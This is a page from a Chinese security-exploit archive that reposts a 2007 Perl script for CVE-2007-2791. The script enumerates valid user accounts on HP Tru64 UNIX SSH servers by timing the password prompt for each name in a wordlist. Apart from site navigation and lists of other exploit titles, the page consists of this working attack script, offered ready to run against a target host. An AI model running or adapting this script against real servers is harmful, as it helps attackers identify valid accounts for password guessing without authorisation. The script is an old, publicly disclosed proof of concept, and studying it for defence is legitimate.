首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
HP Tru64 Remote Secure Shell User Enumeration Exploit (CVE-2007-2791)
来源:http://rawlab.mindcreations.com 作者:Andrea 发布时间:2007-06-05  
#!/usr/bin/perl
use warnings;
use strict;
#
# Remember: you need to accept ssh key first!
#
use Tie::File;
use Fcntl 'O_RDONLY';
use Expect;
use Time::HiRes qw(gettimeofday);
#
# tru64-sshenum.pl
# HP Tru64 Remote Secure Shell user enumeration exploit (CVE-2007-2791).
#
# Author: Andrea "bunker" Purificato
# http://rawlab.mindcreations.com
#
# The following supported software versions are affected:
#
#  HP Tru64 UNIX v5.1B-4
#  HP Tru64 UNIX v5.1B-3
#
# The Hewlett-Packard Company thanks Andrea Purificato for reporting this
# vulnerability to security-alert@hp.com
#
# References:
#  - http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?lang=en&cc=us&objectID=c01007552
#  - http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-2791
#  - http://rawlab.mindcreations.com/codes/exp/nix/tru64-sshenum.pl
#

my $verbose = undef;
my $port    = 22;
my $timeout = 10;

print <<BANNER;
$0 - HP Tru64 Remote Secure Shell user enumeration exploit

Andrea "bunker" Purificato - http://rawlab.mindcreations.com
37F1 A7A1 BB94 89DB A920  3105 9F74 7349 AF4C BFA2

BANNER

print "Usage: $0 <target> <userlist>\n" and exit(-1) if ($#ARGV<1);

my $target   = $ARGV[0];
my $wordlist = $ARGV[1];
chomp (my $ssh  = `which ssh`);
chomp (my $tel  = `which telnet`);
my %htimes; my @atimes;

print "[+] Grabbing banner...\n";
my $exp = Expect->spawn("$tel -l fake $target $port")
or die "Cannot spawn $tel: $!\n";;
#$exp->log_stdout(0);
$exp->expect(5,['SSH|ssh'=>sub{$exp->send(".\n")}]);
$exp->close();
print "[+] Done!\n\n";

sub timing {
    my $user = shift @_;
    my $t0 = gettimeofday;
    my $t1 = undef;
    my $exp = Expect->spawn("$ssh -l $user -p $port $target")
or die "Cannot spawn $ssh: $!\n";;
    $exp->log_stdout(0);
    $exp->expect($timeout,['assword:'=>sub{$exp->send(".\n")}]);
    $exp->expect(undef,   [ qr'assword|denied'=>sub{$t1=gettimeofday}]);
    $t1 = gettimeofday unless ($t1);
    $exp->close();
    return sprintf "%0.3f", ($t1-$t0);
}

tie my @wlst_ln, 'Tie::File', "$wordlist", mode=>O_RDONLY
    or die "$wordlist: $!";

print "[+] Started, please wait: ";
for (@wlst_ln) {
    print "($_ dup?)" if ($htimes{$_});
    my $ret = timing($_);
    $htimes{$_} = $ret unless ($htimes{$_});
    push @atimes, $ret;
    unless ($verbose) { print "." }
    else { print "$_\t\t$ret\n" }
}
print " Done!\n\n";

#
# Do whatever you want with time values:
#
# (sorted by values)
#
foreach my $key (sort {$htimes{$b}<=>$htimes{$a}} keys %htimes) {
     print "$key:\t\t$htimes{$key}\n";
}
exit(0);

 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·EQdkp <= 1.3.2 (listmembers.ph
·SNMPc <= 7.0.18 Remote Denial
·Sendcard <= 3.4.1 (Local File
·IBM Tivoli Provisioning Manage
·PBLang <= 4.67.16.a Remote Cod
·DVD X Player 4.1 Professional
·Comicsense 0.2 (index.php epi)
·IE6 / Provideo Camimage (ISSCa
·DRDoS - Distributed Reflection
·Microsoft IIS <= 5.1 Hit Highl
·Wordpress 2.2 (xmlrpc.php) Rem
·Pheap 2.0 Admin Bypass / Remot
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved